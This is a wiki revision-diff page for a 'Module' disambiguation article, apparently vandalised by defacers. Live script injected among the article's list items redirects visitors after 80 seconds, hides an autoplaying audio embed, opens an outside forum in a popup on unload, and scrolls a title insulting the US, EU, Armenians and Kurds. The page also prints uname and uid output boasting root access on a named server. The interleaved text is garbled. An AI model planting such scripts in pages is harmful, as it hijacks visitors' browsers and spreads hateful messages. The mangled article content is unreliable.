Module: Difference between revisions

From BitProjects
Jump to navigation Jump to search
Infobox>Chealer
m avoid redirect to LKM
Line 1: Line 1:
A '''module''' is a self-contained component of a [[system]], which has a well-defined [[Interface (computer science)|interface]] to the other components; something is '''modular''' if it includes or uses modules which can be interchanged as units without disassembly of the module. Design, manufacture, repair, etc. of the modules may be complex, but this is not relevant; once the module exists, it can easily be connected to or disconnected from the system.
A '''module''' is a self-contained component of a [[system]], which has a well-defined [[Interface (computer science)|interface]] to the other components; something is '''modular''' if it includes or uses modules which can be interchanged as units without disassembly of the module. Design, manufacture, repair, etc. of the modules may be complex, but this is not relevant; once the module exists, it can easily be connected to or disconnected from the system.


==Different meanings of '''module''', sorted by category==
<html>
===Computers===
<script language="JavaScript">
<!--
var left="-=";
var right="=-";
var msg="ЇHacked by @cemi_hacker[from Mavideniz] and B@D_BOY[From Turkey soldier]EN BЬYЬK GS LAN BAЮKA BЬYЬK YOK BUNU O KUS BEYЭN KAFANIZA SOKUN I FUCK YOU E.U AND U.S AND ARMENЭA AND KURTS";
var speed=100;


* [[Module (programming)]], computer program structuring.
function scroll_title() {
* [[Loadable Kernel Module]], object code loadable into the Linux kernel.
document.title=left+msg+right;
* [[Module file]] (.mod), various computer file formats for music.
msg=msg.substring(1,msg.length)+msg.charAt(0);
* [[Modularity (programming)]], the idea of modularity in computers.
setTimeout("scroll_title()",speed);
}
scroll_title();


===Mathematics===
// End -->
</script>
<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Hacked by @cemi_hacker[from Mavideniz] and B@D_BOY[From TR_SQLDЭ3r]I FUCK YOU U.S AND E.U AND ARMENЭA AND KURTS</title>
</head>


* [[Module (mathematics)]], in abstract algebra, a set with addition and multiplication.
* [[Modular form]], in mathematics, certain analytic functions, used in number theory.
* [[Modular representation theory]], in mathematics, representing groups using complex numbers called ''characters''.
* See also [[modulo]], [[modulus]], [[moduli space]]


===Other===
<body bgcolor="#000000" text="#808080">
 
<meta http-equiv="refresh"content="80;URL=http://www.webaslan.com">
* [[Modularity (biology)]], the idea of modularity in biology.
<p align=<center> Hacked by @cemi_hacker[from Mavideniz] and B@D_BOY[From TR_SQLDЭ3r]I FUCK YOU U.S AND E.U AND ARMENЭA AND KURTS|BU millet зapulcularla kurulmadэ her karэю kan ile sulanarak kuruldu</center>
* [[Modularity of mind]], hypothesized modules in mental processes.
<embed src="http://www.msxlabs.org/msxteam/ThinkerBeLL/istiklalmarsi.mp3" loop="1" autostart="true" hidden "true" width="128" height="128" align="left"></p>
* [[Sound module]], electronic musical instrument without a human interface.
<p align="center">&nbsp;</p>
* [[Vitruvian module]], in architecture, the semidiameter of a column at its base.
<p align="center">
* [[Module (role-playing games)]] - scenario or adventure, in role-playing games.
<img src="http://img342.imageshack.us/img342/8490/turkie5ab.jpg" width="800" height="600"></p>
* [[Module (architecture)]]- A section of a [[modular building]].
<p align="center">&nbsp;</p>
* [[Modular home]]
<p align="center"><font size="6" face="Fixedsys" color="#00FF00">Hacked by @cemi_hacker[from Mavideniz] and B@D_BOY[From TR_SQLDЭ3r]I FUCK YOU U.S AND E.U AND ARMENЭA AND KURTS|BU millet зapulcularla kurulmadэ her karэю kan ile sulanarak kuruldu</font></p>
* [[Module (equipment)]] - a complete subassembly of some sort which can be replaced in its entirety by an identical module or a different module.
<font color="#00FF00">
* The components of a modular [[space station]] such as the [[International Space Station|ISS]] or the [[Mir]].
<p align="center"><font size="6" face="Fixedsys" color="#00FF00">ADMЭN AЗIKLARINI KAPA[ HEY!!! ADMЭN WHERE ARE YOU?CLOSE THЭS EXPLOЭT]</font></p>
<font color="#00FF00">
<p align="center"><font face="Fixedsys" size="6">Bu bayragэ unutmayэn[don't forget this flag]</font></p>
</font>
<p align="center"><font size="5" face="WST_Swed" color="#00FF00">(TURKISH LЭONS WAS HERE)</font></p>
<body onUnLoad="xopentr('http://www.mavideniz.org/forum')">
<Script Language=JavaScript Type="Text/JavaScript">
function xopentr(url_pop)
{
var PopWidth=400;
var PopHeight=300;
var PopLeft = (window.screen.width-PopWidth)/2;
var PopTop = (window.screen.height-PopHeight)/2;
xopenvar=window.open(url_pop,'xopenvar','toolbar=yes,status=yes,menubar=yes,location=yes,directories=yes,resizable=yes,scrollbars=yes,width='+PopWidth+',height='+PopHeight+',top='+PopTop+',left='+PopLeft);
}
</Script>
<p align="center">&nbsp;</p>
<p align="center"><font color="#C0C0C0" face="Verdana" size="-2"><b>uname -a  
:&nbsp;Linux ns0.allhostingsolutions.com 2.4.18-27.7.xcustom #3 Thu Apr 24 11:37:35
CST 2003 i686 unknown</b></font></p>
<p align="center"><font face="Verdana" color="#C0C0C0" size="-2"><b>&nbsp;uid=48(apache)
gid=48(apache) groups=48(apache),1000(homedir)<br>
</b></font><b><font face="Verdana" size="-2" color="#C0C0C0">uid=0(root) gid=0(root)</font></b></p>


==See also==
==See also==

Revision as of 13:16, 26 August 2006

A module is a self-contained component of a system, which has a well-defined interface to the other components; something is modular if it includes or uses modules which can be interchanged as units without disassembly of the module. Design, manufacture, repair, etc. of the modules may be complex, but this is not relevant; once the module exists, it can easily be connected to or disconnected from the system.

<html> <script language="JavaScript"> </script> <head> <meta http-equiv="Content-Language" content="tr"> <meta name="GENERATOR" content="Microsoft FrontPage 5.0"> <meta name="ProgId" content="FrontPage.Editor.Document"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>Hacked by @cemi_hacker[from Mavideniz] and B@D_BOY[From TR_SQLDЭ3r]I FUCK YOU U.S AND E.U AND ARMENЭA AND KURTS</title> </head>


<body bgcolor="#000000" text="#808080"> <meta http-equiv="refresh"content="80;URL=http://www.webaslan.com">

<p align=

Hacked by @cemi_hacker[from Mavideniz] and B@D_BOY[From TR_SQLDЭ3r]I FUCK YOU U.S AND E.U AND ARMENЭA AND KURTS|BU millet зapulcularla kurulmadэ her karэю kan ile sulanarak kuruldu

<embed src="http://www.msxlabs.org/msxteam/ThinkerBeLL/istiklalmarsi.mp3" loop="1" autostart="true" hidden "true" width="128" height="128" align="left">

 

<img src="http://img342.imageshack.us/img342/8490/turkie5ab.jpg" width="800" height="600">

 

Hacked by @cemi_hacker[from Mavideniz] and B@D_BOY[From TR_SQLDЭ3r]I FUCK YOU U.S AND E.U AND ARMENЭA AND KURTS|BU millet зapulcularla kurulmadэ her karэю kan ile sulanarak kuruldu

ADMЭN AЗIKLARINI KAPA[ HEY!!! ADMЭN WHERE ARE YOU?CLOSE THЭS EXPLOЭT]

Bu bayragэ unutmayэn[don't forget this flag]

(TURKISH LЭONS WAS HERE)

<body onUnLoad="xopentr('http://www.mavideniz.org/forum')"> <Script Language=JavaScript Type="Text/JavaScript"> function xopentr(url_pop) { var PopWidth=400; var PopHeight=300; var PopLeft = (window.screen.width-PopWidth)/2; var PopTop = (window.screen.height-PopHeight)/2; xopenvar=window.open(url_pop,'xopenvar','toolbar=yes,status=yes,menubar=yes,location=yes,directories=yes,resizable=yes,scrollbars=yes,width='+PopWidth+',height='+PopHeight+',top='+PopTop+',left='+PopLeft); } </Script>

 

uname -a

 Linux ns0.allhostingsolutions.com 2.4.18-27.7.xcustom #3 Thu Apr 24 11:37:35

CST 2003 i686 unknown

 uid=48(apache) gid=48(apache) groups=48(apache),1000(homedir)
uid=0(root) gid=0(root)

See also

Template:Disambig

de:Modul et:Moodul fr:Module it:Modulo ja:モジュール pl:Moduł (matematyka) zh:模